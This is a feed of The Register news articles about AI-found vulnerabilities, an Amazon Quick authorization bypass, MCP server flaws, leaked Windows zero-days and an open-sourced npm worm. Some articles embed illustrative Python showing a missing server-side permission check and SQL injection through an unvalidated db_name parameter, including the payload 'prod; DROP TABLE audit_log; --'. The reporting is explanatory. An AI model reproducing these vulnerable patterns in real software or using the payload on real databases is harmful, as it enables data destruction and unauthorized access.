News

AI models are getting better at replacing cybersecurity pros on certain tasks

The Register - 1 hour 6 min ago
The UK AI Security Institute (AISI) has found that frontier models are quickly becoming more efficient when asked to do some cybersecurity work. AISI measures this with its "time window benchmark for cybersecurity," which estimates how much work an AI can do compared to a human. The benchmark yields findings such as: Claude Sonnet 4.5 can, about 80 percent of the time, complete tasks that take a human cybersecurity expert 16 minutes, given a budget of 2.5 million tokens. AISI has found the human-comparable task time – 16 minutes in this instance – is growing, fast. If tokens flowed freely instead of being arbitrarily capped, AI models might do better still. In February 2026, AISI internally reduced the expected task time doubling period from 8 to 4.7 months, based on progress made since late 2024. With the release of Anthropic's Mythos Preview and OpenAI's GPT-5.5, AISI has once again had to compress its projected doubling period. "In February 2026, we estimated that frontier models' 80 percent-reliability cyber time horizon had doubled every 4.7 months since reasoning models emerged in late 2024, given a 2.5M token limit," the AISI said in a post on Wednesday. "This was around half our November 2025 doubling time estimate, which was 8 months for both 50 percent and 80 percent reliability. Claude Mythos Preview and GPT-5.5 have since significantly outperformed this trend." The recalculated doubling time estimate, given what Mythos Preview and GPT-5.5 can do, is even shorter than 4.7 months. AISI does not cite a specific value, but the organization points to similar time horizon estimates based on measurements of a broader skillset, software engineering, made by non-profit AI research house METR. "Their results imply a consistent doubling time of 4.2 months on software tasks since late 2024," AISI said, noting that with the latest Mythos Preview checkpoint (model update), it's closer to 4 months.
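The arithmetic behind such a doubling estimate is straightforward exponential-growth math. As an illustrative sketch (the function name and figures below are ours, not AISI's actual methodology):

```python
import math

def doubling_time_months(horizon_start, horizon_end, months_elapsed):
    """Implied doubling period, assuming the task-time horizon grows
    exponentially between two measurement points."""
    doublings = math.log2(horizon_end / horizon_start)
    return months_elapsed / doublings

# Illustrative figures only: a horizon growing from 2 to 16 minutes over
# 14 months is log2(8) = 3 doublings, i.e. a ~4.7-month doubling period.
print(round(doubling_time_months(2, 16, 14), 1))  # -> 4.7
```

A shorter doubling period means each successive model generation roughly doubles the human-equivalent task time it can handle in fewer months, which is why a few strong releases force the estimate down.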
Note that the time window benchmark is not a broad assessment of capabilities – AISI is not saying frontier models are becoming twice as capable by all measures. It's a narrow assessment based on the time it takes people to accomplish security tasks. Citing a different metric, AISI says the latest Mythos Preview checkpoint solved a 32-step simulated corporate network attack called "The Last Ones" in six of 10 attempts and managed to complete a previously unsolved challenge, a seven-step industrial control system attack called "Cooling Tower," in three of 10 attempts. As a point of comparison, when Opus 4.6 was evaluated in February 2026, it completed a maximum of 22 of 32 steps for The Last Ones. That model managed to reach milestone 6, which involves reverse-engineering a Windows service binary to access encrypted credentials, escalating privileges via token impersonation, and recovering a cryptographic key to access a command-and-control management service. "Frontier AI's autonomous cyber and software capability is advancing quickly: the length of cyber tasks that frontier models can complete autonomously has doubled on the order of months, not years," AISI concludes. "What this evidence does not tell us is how the pace of progress will evolve, when AI will reach any particular capability threshold, or how these capabilities will translate against defended, real-world systems." The curl project offers one data point with regard to the real-world implications of the latest frontier models: Mythos managed to find just one confirmed vulnerability in its codebase. But watch this space. ®
Categories: News

Cisco to fire 4,000 staff and generously give them free training – on Cisco

The Register - 4 hours 22 sec ago
Cisco will make around five percent of staff redundant and has generously offered them free Cisco training for a year once they’re gone. CEO Chuck Robbins broke the news in a Wednesday blog post titled “Our Path Forward” that opens “Today we announced our Q3 FY26 earnings with record revenue of $15.8 billion, up 12 percent year over year, and double-digit top and bottom-line growth. The ELT [executive leadership team] and I could not be prouder of the growth you have all delivered for Cisco.” That growth included net income rising 35 percent to $3.4 billion. Yet Robbins’ pride was not sufficient for all Cisco staff to keep their jobs. The CEO said the layoffs are necessary because “The companies that will win in the AI era will be those with focus, urgency, and the discipline to continuously shift investment toward the areas where demand and long-term value creation are strongest.” For Cisco that means “reducing roles in some areas” and also “making clear, strategic investments – particularly in silicon, optics, security, and in our employees’ use of AI across the company.” On Thursday, US time, close to 4,000 unlucky Cisco staff will be shown the door. Robbins said Cisco will help its soon-to-be-former workers find their next gig, and that the company’s efforts to do so have a 75 percent success rate. “We are also committed to continued personalized learning and will provide one year of access to all Cisco U courses and certifications, covering AI, Security, Networking, and more,” he added. Cisco made two big rounds of layoffs in 2024, one of which ejected seven percent of staff, while the other saw Cisco fire five percent of employees. The restructures appear not to have slowed the company down: Robbins said product orders in Q3 rose 35 percent year over year – a figure that encapsulates a 105 percent year-over-year surge in revenue from hyperscalers and a more modest 18 percent growth from other buyers.
Robbins said Cisco has already scored $5.3 billion of AI infrastructure sales this year, and forecast full-year sales of $9 billion – 4.5 times its haul from last year. More prosaic products, like Wi-Fi kit, also grew fast as sales rose 40 percent. The company hopes to keep that cash flowing by building wireless kit that uses less memory. “You’ll see products that’ll become orderable in Q4 that’ll actually require 50 percent less memory,” Robbins said, with the design work to make that possible an example of the “20-plus programs that we’ve put into place that are active to reduce the memory utilization across the portfolio.” Cisco is doing that even though the rising price of memory and storage has not put a dent in its margins, an outcome that execs attributed to supply chain management efforts.

Glasswing to lift security sales

Later in the earnings call, Robbins revealed that Cisco is participating in Anthropic’s Project Glasswing and using the Mythos model to test its code. The CEO said another impact of Anthropic’s bug-finding AI will be to accelerate plans to replace security appliances once other vendors’ use of Mythos finds flaws that are hard to fix. “I actually think while there will be a security opportunity, there’s going to most likely be a lot of focus from our customers on modernizing their infrastructure so that they don’t have this risk from technology that just can’t be patched,” Robbins said. Robbins said Cisco may have won an order or two from customers who were already close to replacing old security kit “and Mythos pushed them over the edge.” But he said Cisco didn’t receive “any meaningful orders in Q3 as a result of Mythos, but that could change in the future as we continue to work with customers.” ®
Categories: News

Welcome to the vulnpocalypse, as vendors use AI to find bugs and patches multiply like rabbits

The Register - 8 hours 5 min ago
The vulnpocalypse has begun. Palo Alto Networks usually finds five vulnerabilities a month, but on Wednesday said it scanned its entire codebase using the latest frontier models, including Anthropic’s Mythos, and found 75 security holes, covered in 26 CVEs. This comes a day after Microsoft said it used its new agentic bug hunting system called MDASH to find 17 vulnerabilities across its products - on a record-setting Patch Tuesday that saw Redmond disclose a whopping 30 critical CVEs. Plus, last week Mozilla said it fixed 423 Firefox bugs in April, more than five times the 76 fixes issued in March and almost 20 times its monthly average of 21.5 last year. The browser maker previously said Mythos found 271 flaws in Firefox 150. It shouldn’t be all that shocking. Security vendors have long warned about attackers using AI, and how this means defenders need to operate at AI speed to protect their own networks and systems (aka buying their AI-infused products). Now that models have become really good at finding bugs in code, security shops are using AI to scan their own software, hopefully to uncover and fix flaws before the baddies do. And that boils down to two things: more patches, and more work for admins. Zero Day Initiative’s chief vuln finder Dustin Childs agrees with this assessment. “At first, yes, this means more patches and thus more work for admins,” he told The Register. “The goal over time would be to eliminate as many as possible, and, over time, that monthly number goes down.” What will make this whole AI bug hunting season “really painful,” he continued, is if the patches don’t work or - worse yet - break things. “Many customers don’t trust patches as it is, so if AI-related patches break things, they are less likely to apply as time goes on,” Childs added.
“This will be true even if AI only finds the bugs and doesn’t make the patches.”

Bug hunting on steroids

This isn’t to say security companies should avoid AI to find and fix flaws. “All vendors should use what tools they have to find and remediate bugs before they are exploited in the wild,” Childs said. “Ideally, they would find the bugs before they even ship, but I’m not holding my breath for that to happen.” Both Microsoft and Palo Alto Networks (PAN) are part of Anthropic’s Project Glasswing, which means they are among the select group of entities allowed to test Mythos, the much-hyped LLM, to find security holes in their own products. Palo Alto Networks began testing Mythos on April 7, and has since continued using the LLM and other frontier models, including Claude Opus 4.7 and OpenAI’s GPT-5.5-Cyber, according to product manager Lee Klarich. “Today, we released our May ‘Patch Wednesday’ security advisories,” Klarich said in a Wednesday blog, adding that “this is the first time where the majority of findings were the result of frontier AI models scanning our code.” The LLMs scanned over 130 Palo Alto Networks products and platforms, and as noted above found 75 issues, covered in 26 CVEs. None of these bugs are under exploitation, and as of Wednesday the company has fixed all bugs in its SaaS-delivered products and coded patches for all customer-operated products.
Maybe 5 months before 'AI-driven exploits the new norm'

“We intend to fix every vulnerability we find before advanced AI capabilities become widely available to adversaries,” Klarich said in his blog, adding that his company expects “a narrow three-to-five-month window for organizations to outpace the adversary before AI-driven exploits start to become the new norm.” A day earlier, Microsoft said its new multi-model agentic scanning harness (codename MDASH) helped researchers find 16 new vulnerabilities across the Windows networking and authentication stack, as disclosed in May’s Patch Tuesday event. This included four critical remote code execution flaws in components such as the Windows kernel TCP/IP stack and the IKEv2 service. “Unlike single-model approaches, the harness orchestrates more than 100 specialized AI agents across an ensemble of frontier and distilled models to discover, debate, and prove exploitable bugs end-to-end,” Microsoft VP of agentic security Taesoo Kim said in a Tuesday blog. Tom Gallagher, VP of engineering at Microsoft Security Response Center, admitted that “this month's release sits on the larger side of a hotpatch month.” Gallagher said he expects AI-assisted bug hunting to increase Patch Tuesday releases as both Microsoft and third-party researchers use these tools to boost vulnerability discovery. And yes, all of this ultimately means more patches and more work.

More patches = more work

“Finding bugs has always been the cheap end of the pipeline,” Luta Security CEO Katie Moussouris told The Register. “Triage, disclosure, building patches that do not break production, and getting customers to deploy them is the expensive end, and nobody has funded it for this volume.” Moussouris helped convince Redmond's top brass that Microsoft needed a bug bounty program in 2013, and three years later started her own bug bounty consultancy. She noted Palo Alto Networks’ staggering jump in CVEs this month.
“Multiply that across every vendor and the bottleneck becomes admins and vulnerability management teams,” Moussouris said. And she also stressed that people should be using these new models to find vulnerabilities. “It is exactly what defenders should be doing,” Moussouris said. “Both PAN and Microsoft landed on the same answer: no single model catches everything. PAN ran Claude Mythos, Claude Opus 4.7, and GPT-5.5-Cyber because each finds bugs the others miss,” she added. “Microsoft orchestrates over 100 specialized agents across multiple models. Add threat intel and codebase context, and Microsoft rediscovered 96 percent of five years of confirmed bugs in a critical Windows component. The asymmetry is temporary, PAN puts adversary parity at three to five months, so any vendor not scanning their own code now is letting someone else find their bugs first.”®
Categories: News

AWS to Quick admins: The access control didn't work, but you weren't using it anyway, so what's the problem?

The Register - Wed, 13/05/2026 - 23:56
Most users put up with AWS the way you put up with the DMV. I say this with love, but it's hard to disagree that the UI is awful. The console is a UX time capsule if time capsules weren't allowed to ever look like other time capsules. The pricing pages were designed by someone who hates you personally, and you accept all of it because the one thing AWS has historically gotten right is the boring, important stuff. The security model. The IAM language no one likes, but everyone trusts. The boundary between your account and someone else's. Get that wrong, and the whole bargain collapses. So when Fog Security disclosed an authorization bypass in Amazon Quick on May 12 (that's the BI service formerly known as QuickSight, briefly known as Quick Suite, and now apparently just Quick, but check back next week) and AWS responded with a statement claiming "no customer data was at risk," it's fair to ask which definition of customer data they're using. Because it isn't an obvious one, and it certainly isn't mine.

What Fog found

Fog reports that when an Amazon Quick administrator (which is an absolutely devastating personal insult) uses "custom permissions" to explicitly deny access to AI Chat Agents, the UI correctly hides the feature. Great! Awesome! I sure wish to hell I could do that with S3 buckets to which I do not have access! Notably, there's no other way for an admin to do this - it's custom permissions or naught. The API, however, was perfectly willing to keep answering chat requests for any user in the account who knew how to send them. Fog's proof-of-concept was a non-admin asking the agent "Tell me about mangoes" from a session that was, on paper, locked out of the agent entirely. The agent told them about mangoes. AWS deployed the fix between March 11 and March 12, eight days after Fog reported it via HackerOne. So far, so coordinated. Seriously, for a company of this scale, that's underpants-outside-the-pants superhero speed. Good for you; gold star.
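The failure mode Fog describes - a permission enforced when rendering the UI but never re-checked at the API - is a classic. A minimal, hypothetical sketch of the broken pattern and its fix (all names here are illustrative, not AWS's actual code):

```python
# Hypothetical permission store: one user explicitly denied chat agent access.
PERMISSIONS = {"contractor": {"chat_agent": False}}

def allowed(user, feature):
    # Default-allow, matching the "deny via custom permissions" model.
    return PERMISSIONS.get(user, {}).get(feature, True)

def render_ui(user):
    # The UI correctly hides the feature from denied users...
    features = ["dashboards"]
    if allowed(user, "chat_agent"):
        features.append("chat_agent")
    return features

def handle_chat_request(user, prompt):
    # ...but the endpoint never consults the same permission, so a direct
    # HTTP request from any authenticated user in the account still works.
    return f"answer for {prompt}"

def handle_chat_request_fixed(user, prompt):
    # The fix: enforce the permission server-side on every request.
    if not allowed(user, "chat_agent"):
        raise PermissionError("chat agent access denied")
    return f"answer for {prompt}"
```

As written, the unpatched handler happily answers a denied user who hits the endpoint directly; only the server-side check makes the custom permission a real security boundary rather than a cosmetic one.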
What came next

Where this gets uncomfortable is the response. AWS classified the severity as "none." It issued no customer notification. It published no advisory. After Fog disclosed the HackerOne report and published a blog post, AWS provided a statement to Fog Security reading, in full: "We appreciate Fog Security's coordinated disclosure. This issue was addressed in March 2026. No customer data was at risk and there is no customer action required. As always, customers can contact AWS Support with any questions or concerns about the security of their account." Take that sentence apart and see how much work "no customer data was at risk" is doing. Amazon Quick is described on its own product page as an AI assistant that "connects Slack, Microsoft Teams and Outlook, CRMs, databases, and documents in one place" and "grounds every answer in your real business data." The default chat agent, which is automatically and annoyingly provisioned the instant Quick is enabled whether the customer wants those AI features or not, is the front end for that data. It is the whole point of the front end for that data. Now consider the actual scenario AWS just patched. An administrator at, say, a regulated bank (an unregulated bank is called "a criminal enterprise that hasn't been caught yet") configures custom permissions denying chat agent access to a large group of users. Maybe those users are contractors. Maybe they're in a business unit that isn't cleared for AI tools. Maybe the bank's compliance posture flat-out prohibits shadow AI usage on top of internal data. Until two months ago, every one of those users could send an HTTP request directly to the agent endpoint and get a response. Fog asked about mangoes because they're a security firm doing a clean disclosure, not a malicious insider. A malicious insider would not have asked about mangoes. The question to AWS, with no rhetoric attached: In what sense was customer data not at risk?
Either the chat agent doesn't actually have access to the data the product page says it does (in which case the marketing department has some serious splainin' to do) or unauthorized users could query an agent wired into customer data, in which case "customer data was at risk" is the correct English-language description of the situation.

AWS clarifies, and says the quiet part out loud

After this story started circulating, AWS offered a follow-up comment that I sincerely appreciate, because it's so much more honest than the first one. Per a hounded-looking AWS spokesperson: "The researcher was using the Admin Control capability that no customers were actively using when the server side validation was not present." Reading that twice doesn't help. Let me translate. AWS is saying: Yes, the server-side authorization check was missing. Yes, an authenticated user in your Quick account could bypass the only access control mechanism the service offers. The reason this is fine, apparently, is that no real customer had bothered to configure that access control during the window when it didn't work. Um ... what? The defense isn't "the bug wasn't real," which you could be forgiven for hearing in AWS's first statement. The defense also isn't "the bug couldn't have done what Fog says it could have done," which is the even stronger implication of their first statement. The defense is "the access control didn't enforce what we said it did, but luckily nobody was relying on it." This is the corporate-comms equivalent of "the lock on the front door didn't work, but nobody had locked it anyway, so why are you upset?" It's also a surprisingly specific telemetry claim. AWS is asserting that they know zero customers had configured custom permissions to deny chat agent access during the exposure window.
That's a confident thing to say, and an even more interesting thing to volunteer as a defense, because it doubles as a withering review of Quick's access management model: the only knob the service provides for this purpose, the one AWS's own documentation explicitly tells administrators to use, has zero recorded uptake. The same follow-up also pointed back to the HackerOne thread to demonstrate that AWS told Fog throughout the disclosure window that "user-based authorization remained enforced." Translation: you needed authenticated credentials in the same Quick account to exploit this. Yes. That's intra-account scope, which Fog documented in their writeup, and which is precisely the scope in which custom permissions are supposed to function as a security boundary. AWS saying "user-based authorization was fine" is saying "you couldn't exploit this anonymously from the internet," which was never the threat model in question. The threat model is the contractor with valid SSO credentials whose admin tried to lock them out of some datasets.

Why this matters more than it sounds

Amazon Quick's access model is already an outlier: IAM policies don't govern Quick's AI Chat Agent, SCPs don't apply, and RCPs don't apply. Custom permissions are the only knob the service provides. If those don't enforce, nothing else does. And per AWS's own follow-up, literally nobody was using them anyway. Both halves of that sentence should be alarming, and AWS is offering them as reassurance. AWS's competitive moat for the last decade hasn't been pricing. It sure as poop hasn't been developer experience, documentation, console design, or the inscrutable poetry of service names. It's been the well-earned belief that AWS gets the foundational things right: boundaries, identity, durability, reliability, and the parts customers can't easily verify themselves. Customers have paid the AWS premium because they trusted the boring stuff.
This year that trust is being tested in a way it hasn't been before. The 2025–2026 cadence of AWS security advisories has noticeably increased, for reasons that are as yet unclear. Coordinated disclosures from independent researchers keep surfacing missing authorization checks in newer, AI-adjacent services. The fixes are landing fast, which is good. The customer communication isn't landing at all, which is, charitably, a choice. A "severity: none" rating on a bypass of the only access control a service offers is not an objective security finding so much as it is a communication decision. And the communication decision now reads, with the benefit of AWS's follow-up: "We'll fix the bug, we won't tell you it existed, and if you ask we'll explain that you weren't using the feature anyway." AWS gets a lot of forgiveness on the small stuff because they own the big stuff. They might want to reconsider how much of the big stuff they keep classifying as "none." ®
Categories: News

Bug hunter tracks down three massive MCP flaws and one vendor won't fix theirs

The Register - Wed, 13/05/2026 - 21:17
Security vulnerabilities in MCP servers for three popular database projects could let attackers execute unintended SQL statements on Apache Doris, exfiltrate sensitive metadata from Alibaba RDS, and potentially take over Apache Pinot instances exposed to the internet. Alibaba, meanwhile, declined to patch its flaw. Apache issued a patch and a CVE tracker for Doris MCP, and there’s an open ticket in the MCP Pinot GitHub repository for the flaw, we're told. However, Alibaba decided not to patch the vulnerability in RDS MCP, according to Akamai security analyst Tomer Peled, who wrote about the flaws on Tuesday and will present his full research next month at x33fcon. MCP, or Model Context Protocol, is an open source protocol originally developed by Anthropic that allows LLMs, AI applications, and agents to connect to external data, systems, and one another. While security issues are never a good thing - and they are especially concerning when they exist in a server sitting between an AI agent and a production database - these in particular point to a larger problem in the way MCPs are developed. “There is missing or faulty security validation between the MCP server and its back end,” Peled wrote, adding that these security “gaps will become high-value targets for attackers and we expect more of these issues to surface.” Here’s a closer look at all three, starting with the flaw that has since been fixed and assigned a CVE. Apache Doris is a high-speed analytics and search database with more than 10,000 mid- and large-enterprise users. Its MCP server allows AI agents to interact with and perform operations on Doris instances. This includes SQL queries and retrieving table and schema metadata - and foreshadows the flaw in question: CVE-2025-66335, a SQL injection vulnerability that affects Apache Doris MCP Server versions earlier than 0.6.1.
When an MCP tool is called, the server’s “exec_query” function fails to validate one of the five parameters (the db_name parameter) before constructing the SQL query. This means an attacker can invoke the function and inject malicious SQL through the db_name parameter, which gets prepended to the beginning of the final SQL statement. Plus, the SQL validator only checks the first portion of the query, so all it sees is the attacker’s directive. “As a result, any attacker that gains access to a client connected to the Doris MCP server can execute arbitrary commands on the victim’s Apache Doris instance,” Peled said. Apache issued a patch in December to fix this flaw. The second issue, an authentication validation bypass in Apache Pinot MCP, can also lead to SQL injection attacks and full database takeover. Apache Pinot is another super-fast analytics database, and StarTree’s MCP integration for Pinot before v2.0.0 allowed users to run queries directly from their AI agent against their Pinot instance. The open-source project uses HTTP as the transport layer without requiring any type of authentication. This exposes the endpoint to remote attackers who can reach it, allowing them to invoke MCP tools, including those used for SQL execution. “In environments where the MCP endpoint is reachable externally, this behavior allows unauthenticated attackers to execute queries against the Pinot instance, which can allow a full remote takeover of the database,” Peled wrote. StarTree has since added OAuth as an authentication option when using HTTP, which he says lowers the threat of SQL injection (but it still exists in the code), and Apache has also opened a security issue in the MCP Pinot GitHub repository. Pinot MCP v1.1.0 and earlier versions are affected. Neither Apache nor StarTree responded to The Register’s requests for comment.
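The Doris issue follows a textbook injection shape: attacker-controlled input lands at the front of the statement, and the validator only inspects that front. A hypothetical sketch of the pattern Peled describes (illustrative names, not the project's actual code):

```python
def build_query(db_name, table):
    # The db_name parameter is interpolated unvalidated and ends up at the
    # front of the final statement, so attacker-supplied SQL runs first.
    return f"USE {db_name}; SELECT * FROM {table} LIMIT 10"

def naive_validator(sql):
    # A validator that only checks the first portion of the query sees only
    # the (benign-looking) prefix and never inspects what rides behind it.
    first_statement = sql.split(";")[0].strip()
    return first_statement.upper().startswith("USE")

# The injected DROP TABLE is smuggled in through db_name...
payload = "prod; DROP TABLE audit_log; --"
query = build_query(payload, "orders")
print(query)

# ...yet the prefix-only check still passes.
print(naive_validator(query))  # -> True
```

The fix is the usual one: treat db_name as data, not SQL - validate it against a whitelist of known database names or pass it through parameterized APIs rather than string interpolation.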
The third security flaw, an information disclosure issue in the Alibaba RDS MCP server, also stems from the server not authenticating users before invoking the retrieval-augmented generation (RAG) MCP tool, which allows AI models to connect with and query databases. This means “any client able to reach the MCP endpoint can issue requests to the server without any query validation,” according to Peled. “The vector index may contain table names, schema definitions, or other potentially sensitive metadata, and unauthenticated attackers can exfiltrate this data with little or no effort." All versions of Alibaba RDS MCP are affected by this vuln. The bug hunter says that he reported the issue to Alibaba in November, and the cloud giant told him the issue is “not applicable” for a fix - so it’s still in the codebase. Akamai also reported this inaction to the CERT Coordination Center (CERT/CC). Alibaba did not respond to The Register’s inquiries. Peled said that the threat-hunting team, upon starting this investigation, assumed that there would be some baseline security specification for all MCP servers. Turns out they were wrong, and as the research found, flaws like SQL injection, missing authentication, and insufficient query validation exist in the code. “This means that more attention should be given not just to the specification but also to the best security practices guides when developing secure MCP servers,” he wrote.®
Categories: News

Mystery Microsoft bug leaker keeps the zero-days coming

The Register - Wed, 13/05/2026 - 17:16
The anonymous security researcher who has already maliciously exposed three Windows zero-days this year has revealed two more, dropping them just after Microsoft's monthly Patch Tuesday update. Nightmare-Eclipse, or Chaotic Eclipse, depending on which of their aliases you prefer, released details about YellowKey and GreenPlasma - respectively a BitLocker bypass and a privilege escalation flaw that hands SYSTEM access to attackers. Experts speaking to The Register warned that both vulnerabilities present serious security concerns, especially since Nightmare-Eclipse released substantial technical information about exploiting them. Nightmare-Eclipse described YellowKey as "one of the most insane discoveries I ever found." They provided the files, which have to be loaded onto a USB drive, and if the attacker completes the key sequence correctly, they are granted unrestricted shell access to a BitLocker-protected machine. When it comes to claims like these, we usually exercise some caution, as this bug requires physical access to a Windows PC. However, BitLocker is Windows' last line of defense for stolen devices, so bypassing the technology grants thieves the ability to access encrypted files. Rik Ferguson, VP of security intelligence at Forescout, said: "If [the researcher's claim] holds up, a stolen laptop stops being a hardware problem and becomes a breach notification." Despite the physical access requirement, Gavin Knapp, cyber threat intelligence principal lead at Bridewell, told The Register that YellowKey remains "a huge security problem for organizations using BitLocker." Citing information shared in cyber threat intelligence circles, he added that YellowKey can be mitigated by implementing a BitLocker PIN and a BIOS password lock. Nightmare-Eclipse hinted at YellowKey also acting as a backdoor, allegedly injected by Microsoft, although the people we spoke to said this was impossible to verify based on the information available.
The researcher also published partial exploit code for GreenPlasma, rather than a fully formed proof-of-concept (PoC) exploit. Ferguson noted attackers need to take the code provided by the researcher and figure out how to weaponize it themselves, which is no small task: in its current state it triggers a UAC consent prompt in default Windows configurations, meaning a silent exploit remains a work in progress. Knapp warned that these kinds of privilege escalation flaws are often used by attackers after they gain an initial foothold in a victim's system. "These elevation of privilege vulnerabilities are often weaponized during post-exploitation to enable threat actors to discover and harvest credentials and data, before moving laterally to other systems, prior to end goals such as data theft and/or ransomware deployment," he said. "Currently, there is no known mitigation for GreenPlasma. It will be important to patch when Microsoft addresses the issue."

Four, five… and more?

YellowKey and GreenPlasma are the latest in a series of five Microsoft zero-day bugs the researcher has exposed this year. When Nightmare-Eclipse released BlueHammer (CVE-2026-32201, CVSS 6.5) - patched by Microsoft in April - they were described as a disgruntled researcher who has since been rumored to be a former Microsoft employee. According to their maiden blog post under the Chaotic Eclipse alias, the bug leak began after an alleged violation of trust. "I never wanted to reopen a blog and a new GitHub account to drop code," they wrote. "But someone violated our agreement and left me homeless with nothing. They knew this will happen and they still stabbed me in the back anyways, this is their decision not mine." In early April, the researcher leaked proof-of-concept code for Windows Defender exploits they called RedSun and UnDefend - another admin privilege escalation bug and denial-of-service flaw, respectively - as well as BlueHammer.
Both RedSun and UnDefend remain unfixed, and according to Huntress, the proof-of-concept code released was quickly picked up and abused in real-world attacks. Ferguson described the exposure of YellowKey and GreenPlasma as the latest in an escalating, retaliatory campaign against Microsoft, and warned of more coming. "Prior releases include BlueHammer and RedSun, both of which attracted serious community attention and real forks," he said. "The same post linking yesterday's releases warns of another Patch Tuesday surprise and hints at future RCE disclosures. They claim to have a dead man's switch with more ready to go. This researcher has followed through on every prior threat." ®
Categories: News

Malware crew TeamPCP open-sources its Shai-Hulud worm on GitHub

The Register - Wed, 13/05/2026 - 07:23
Notorious malware crew TeamPCP appears to have open-sourced its Shai-Hulud worm. Security outfit Ox on Tuesday spotted a pair of repos on GitHub, both of which contain the following text:

Shai-Hulud: Open Sourcing The Carnage
Is it vibe coded? Yes. Does it work? Let results speak.
Change keys and C2 as needed.
Love - TeamPCP

The Register checked out the repos a few hours before publishing this story and at the time one listed a single fork, and the other mentioned 31. At the time of writing, those numbers have grown to five and 39. That growth accords with Ox’s assertion that “independent threat actors have already begun modifying it and expanding its reach.” Ox’s analysts looked at the source code in the repos and believe that “the same patterns from previous Shai-Hulud attacks are immediately recognizable, as expected. This includes uploading stolen credentials to a new GitHub repository.” “TeamPCP isn’t just spreading malware anymore – they’re spreading capability. By going open source, they’ve handed any willing actor the tools to build their own variant. The copycats are already here,” Ox opined. TeamPCP may also be using different handles to spread the malware, a theory Ox advanced after spotting another GitHub user named “agwagwagwa” that it says has already forked the malware and submitted a pull request adding FreeBSD support. “TeamPCP’s theme is cats, and agwagwagwa’s GitHub account has a ‘meow!’ repository inside,” Ox noted, before doing a quick Q&A: “Does this mean they are part of the group? We can’t know for sure, but it is very, very suspicious.” The Shai-Hulud worm attacks npm packages and, if it can infect them, looks for AWS, GCP, Azure, and GitHub credentials. If it gains access, it creates and publishes poisoned code to perpetuate itself. If the malware can’t achieve its objectives, it sometimes tries to wipe the local environment in an act of self-destructive vengeance. 
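For defenders, the practical first step is checking whether any poisoned package versions are already in a project's dependency tree. A minimal lockfile-check sketch, assuming a hypothetical IOC list (the package names and versions below are illustrative, not from any advisory):

```python
import json

# Hypothetical IOC list: package name -> set of known-poisoned versions.
# Real lists come from vendor and GitHub advisories.
POISONED = {
    "left-pad-utils": {"2.1.7", "2.1.8"},
    "color-strings": {"4.0.2"},
}

def flag_poisoned(lockfile_text: str) -> list[tuple[str, str]]:
    """Return (name, version) pairs from a package-lock.json v2/v3
    'packages' map that match the IOC list."""
    lock = json.loads(lockfile_text)
    hits = []
    for path, meta in lock.get("packages", {}).items():
        # Keys look like "node_modules/<name>"; the root package is "".
        name = path.rsplit("node_modules/", 1)[-1] if path else lock.get("name", "")
        if meta.get("version", "") in POISONED.get(name, set()):
            hits.append((name, meta["version"]))
    return hits

sample = json.dumps({
    "name": "demo-app",
    "packages": {
        "": {"version": "1.0.0"},
        "node_modules/left-pad-utils": {"version": "2.1.7"},
        "node_modules/color-strings": {"version": "3.9.0"},
    },
})
print(flag_poisoned(sample))
```

The same walk works for any npm v2/v3 lockfile; swap in the indicator lists published for the Shai-Hulud variants as they appear.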
Researchers found the malware in September 2025, and a more powerful variant appeared in November of the same year. Imitators have since created copycat malware, and the original has rampaged its way across the internet. Malware authors sometimes sell their wares so that other miscreants can adapt them to their own needs. However, it is unusual for cyber-crims to give away their work. TeamPCP chose the MIT License, which allows just about any re-use of code. At the time of writing, the Shai-Hulud repos have been online for at least 12 hours and Microsoft’s GitHub appears not to have intervened. ®
Categories: News

Vietnam to develop domestic cloud so it can ditch risky overseas operators for government workloads

The Register - Wed, 13/05/2026 - 04:44
Vietnam has decided to develop its own cloud platform, so its government agencies can stop using foreign-owned services. Prime Minister Le Minh Hung last week announced the plan in Decision 808/QD-TTg, which lists 20 strategic technologies Vietnam wants to develop to improve its technological self-reliance and give its government the tools to tackle national challenges. Developing a national cloud computing platform is number 13 on the list. Machine translation of Decision 808 yields the following goals for the project: “Ensuring national data sovereignty and cybersecurity for the digital government and key digital economic infrastructures; forming a centralized, secure, and reliable digital and data infrastructure to serve national digital transformation; gradually replacing foreign cloud services in state agencies, reducing the risk of data leaks and breaches of state secrets.” The move is a sign that Vietnam’s government, like many others, fears entanglements with cloud providers that may struggle to escape edicts from their home jurisdictions. Yet major hyperscalers Microsoft, Google, and Tencent Cloud have yet to build facilities in Vietnam. AWS will bring one of its lightweight Local Zones to Hanoi, Alibaba Cloud intends to build a datacenter, and Huawei Cloud has expressed interest in doing likewise. Vietnam’s government wants more love from hyperscalers – the nation’s Deputy PM recently met with AWS officials and called for greater co-operation. Yet any Vietnamese government workloads currently operating in a major hyperscaler violate the nation’s own laws that require local storage of personal information! 
Other technologies Vietnam wants to develop include a large-scale Vietnamese language model, virtual assistants, and AI to power applications including cameras, credit risk management, and something that translates as “a national smart education platform applying controlled AI.” The nation also wants its own next-generation firewall, anti-malware software, a next-generation SIEM system, and an “AI-integrated security operations center platform.” Quantum-resistant encryption also makes the list, as does a “user and entity behavior analysis system.” Rare earth processing is another capability Vietnam desires, as are 5G expertise, the ability to build and operate autonomous and industrial robots, and improved semiconductor design skills. Vietnam is in a hurry: Decision 808 set a 2030 deadline to get this all done. According to a Tuesday post to a government news platform, 2030 is also the year in which Hanoi expects all core government services will be online, and digital infrastructure will enable outcomes such as “Ensuring social welfare and supporting crime prevention and control, national security, and social order and safety” plus “Supporting scientific research and innovation.” And in 2035, Vietnam “will become a developed digital nation” in which “National databases, with population data serving as the core, will be interconnected, shared, and effectively utilized to support the development of a smart government, enabling data-driven decision-making based on real-time information.” Smart government will mean “Citizens will benefit from personalized, automated, and convenient digital services tailored to different life events.” What a time to be alive. ®
Categories: News

Doozy of a Patch Tuesday includes 30 critical Microsoft CVEs

The Register - Wed, 13/05/2026 - 00:51
